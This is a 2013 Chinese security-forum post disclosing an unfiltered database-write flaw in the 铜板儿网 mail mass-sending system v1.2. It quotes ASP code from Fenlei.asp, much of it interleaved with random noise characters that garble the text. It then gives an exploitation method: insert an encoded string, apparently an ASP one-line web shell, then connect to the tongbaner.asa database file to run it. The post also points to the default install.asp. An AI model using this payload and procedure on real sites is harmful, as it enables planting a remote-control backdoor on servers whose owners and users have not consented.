找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1836|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp   q6 o. j; Y+ Q/ p

' i* u+ |8 V2 O  c8 Z) O1 DIF Request.QueryString("Action")="del" Then ; X- |* |; k# {- L
ID=Request.QueryString("ID") . c0 Z. i2 G# N5 z
IF Countss ("tui","Fenlei",ID )<>0 then
8 h6 k& \& P! `1 R6 f* ~& \'略
) l3 r+ }, f) l3 x9 h* F: fIF Request.QueryString("Action")="Add" Then 6 B2 x3 m" W6 o5 z9 U% e
Tname=Request.Form("Typename") 1 r# O. q. F, [( m) S2 T, \
Set Rs=Server.CreateObject("adodb.Recordset")   e5 [5 m* e) Z8 S1 D
Sql="Select * From Fenlei Order by id Desc " / G( B( ~" p1 ]$ `" h) w) G
Rs.Open Sql,Conn,1,3
3 c$ Z' O4 _; `/ _" ^Rs.Addnew 8 }2 b" Z- A# M  C5 [, f
Rs("Typename")=Tname
5 {  o5 s" e6 j9 [* G& m1 O! ['略
* x! }/ A5 e; D6 r, N/ V8 b1 VSet Rs=Server.CreateObject("adodb.Recordset")
. y; p4 A  `# R8 x( t. |* iSql="Select * From Fenlei Order by id Desc "
- X( U( ?! N3 p2 k9 ^3 |/ [7 q! fRs.Open Sql,Conn,1,1
# f' o9 l$ |4 _6 ['略
7 @2 Y/ ?# c( q%>. R( J2 M' l$ s  M7 q% }5 v/ I, L$ b
' m  e: a7 q1 D+ m  s

( Y/ u: R8 L( H. }: j
9 a9 N  x2 p5 s: ]* |% M没有过滤,直接写入数据库。, x8 o0 p) G9 W  o, X3 Z

9 L% Z' X8 ?( U) n3 \, `7 C利用方法:
2 V5 J" [( E9 N$ d
: U0 C0 K1 _( n! q2 j插入:┼攠數畣整爠煥敵瑳∨≡┩>9 p8 _: Q2 A! j3 V. c$ q4 H
) D* I) H" W/ Q/ {$ n+ h! P1 T+ f5 w

8 T* `2 b+ n7 w. y2 S; B4 m" x0 ]连接: http://www.xxx.com/###tongbaner.asa
! N5 I9 E# C6 w( f. y- k'默认安装文件:
1 P2 p$ z& i: T+ s/ X'install.asp
( R. T4 s4 B: Y
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表